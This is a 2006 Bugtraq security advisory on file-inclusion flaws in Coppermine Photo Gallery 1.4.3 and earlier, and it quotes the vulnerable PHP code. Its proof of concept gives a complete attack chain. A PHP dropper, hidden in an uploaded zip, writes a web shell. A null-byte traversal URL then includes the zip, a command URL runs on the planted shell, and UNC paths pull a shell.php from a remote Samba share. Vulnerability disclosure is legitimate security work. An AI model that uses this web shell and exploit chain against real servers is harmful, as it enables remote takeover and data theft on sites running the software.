Coppermine Photo Gallery <=1.4.3 remote code execution

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Coppermine Photo Gallery <=1.4.3 remote code execution
From: rgod@xxxxxxxxxxxxx
Date: 18 Feb 2006 04:57:37 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

- Coppermine Photo Gallery <= 1.4.3 arbitrary local/remote inclusion: ---------

- 18/02/2006 5.09.55 -----------------------------------------------------------
--------------------------------------------------------------------------------
software:
site: http://coppermine-gallery.net/index.php
description: "Coppermine is a multi-purpose fully-featured and integrated
web picture gallery script written in PHP using GD or ImageMagick as
image library with a MySQL backend."
--------------------------------------------------------------------------------

i)
vulnerable code in include/init.inc.php near lines 308-343, processing
"lang" argument

...
// Process language selection if present in URI or in user profile or try
// autodetection if default charset is utf-8
if (!empty($_GET['lang']))
{
    $USER['lang'] = $_GET['lang'];           [!!!!!!!!!!!!!!]
}

if (isset($USER['lang']) && !strstr($USER['lang'], '/') && file_exists('lang/' 
. $USER['lang'] . '.php'))
{
    $CONFIG['default_lang'] = $CONFIG['lang'];          // Save default language
    $CONFIG['lang'] = strtr($USER['lang'], '$/\\:*?"\'<>|`', '____________');
}
elseif ($CONFIG['charset'] == 'utf-8')
{
    include('include/select_lang.inc.php');
    if (file_exists('lang/' . $USER['lang'] . '.php'))
    {
        $CONFIG['default_lang'] = $CONFIG['lang'];      // Save default language
        $CONFIG['lang'] = $USER['lang']; // [!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!]
    }
}
else
{
    unset($USER['lang']);
}

if (isset($CONFIG['default_lang']) && 
($CONFIG['default_lang']==$CONFIG['lang']))
{
        unset($CONFIG['default_lang']);
}
if (!file_exists("lang/{$CONFIG['lang']}.php")) 
[!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!]
  $CONFIG['lang'] = 'english';

// We load the chosen language file
require "lang/{$CONFIG['lang']}.php";  [!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!]
...

without to be logged in, arbitrary local inclusion, poc:

look at [!!!!!], code is like this:

...
$USER['lang'] =  $_GET['lang'];
...
$CONFIG['lang'] = $USER['lang'];
...
if (!file_exists("lang/{$CONFIG['lang']}.php"))
  $CONFIG['lang'] = 'english';
...
require "lang/{$CONFIG['lang']}.php";

you have only to supply an existing file using ../ and a null char...
(also regardless of magic_quotes_gpc settings, because of Coppermine disable
code)

you will have no output because is disabled, but you can proceed so:

upload a malicious zip file , inside we have php code like this:

<?php
     $suntzu=fopen("shell.php","w");
     fputs($suntzu,"<?php system(\$HTTP_GET_VARS[CMD]);?>");
     fclose($suntzu);
     chmod("shell.php",777);
?>

now:

http://[target]/[path]/thumbnails.php?lang=../albums/userpics/10002/shell.zip%00

(.zip file contempt is not checked like images and in userpics/ folder we have
a folder numbered like 10000 + userid, you can easily and quicly bruteforce url
to find the malicious file)

if you succeed you can launch commands on target system:

http://[target]/[path]/shell.php?CMD=ls%20-la
---------------------------------------------------------------------------------
ii)

vulnerable code in docs/showdoc.php at line 21:

...
if (isset($_REQUEST['f'])) { $file = $_REQUEST['f']; } else { $file = ''; }
...

...
// harden against expolits: check the requested vars, replace illegal chars
$file = stripslashes($file);                                       [!]
$forbidden_chars = array("..", "/", "%", "<", ">", "$", "'", '"'); [!!]
$file = str_replace($forbidden_chars, '', $file);                  [!!!]
ob_start();
@include($file);                                                   [!!!!]
...

poc: http://[target]/[path]/docs/showdoc.php?f=c:\boot.ini
     http://[target]/[path]/docs/showdoc.php?f=\\192.168.1.2\c\shell.php

(the last one from a samba resource...)

if magic_quotes_gpc=on, "c:\\boot.ini" after stripslashes becomes "c:\boot.ini"
(cause striplashes do not remove all "\"s )
and "\\\\192.168.1.2\\c\\shell.php" becomes "\\192.168.1.2\c\shell.php"

poc 2: http://[target]/[path]/docs/showdoc.php?f=c:\\boot.ini
       http://[target]/[path]/docs/showdoc.php?f=\\\\192.168.1.2\\c\\shell.php

if magic_quotes_gpc=off:
"f" becomes "c:\boot.ini" or "\\192.168.1.2\c\shell.php"

so you can include local and external (Samba) resources regardless of
magic_quotes_gpc settings
________________________________________________________________________________

full proof of concept exploit for i) at this url:

http://retrogod.altervista.org/cpg_143_incl_xpl.html
________________________________________________________________________________

rgod

site: http://retrogod.altervista.org
mail: rgod at autistici org
original advisory: http://retrogod.altervista.org/cpg_143_adv.html
--------------------------------------------------------------------------------

Prev by Date: Re: Internet Explorer Phishing mouseover issue
Next by Date: e107 CMS 0.7.2 Chatbox plugin XSS vulnerability
Previous by thread: [ MDKSA-2006:043 ] - Updated gnupg packages fix signature file verification vulnerability
Next by thread: e107 CMS 0.7.2 Chatbox plugin XSS vulnerability
Index(es):
- Date
- Thread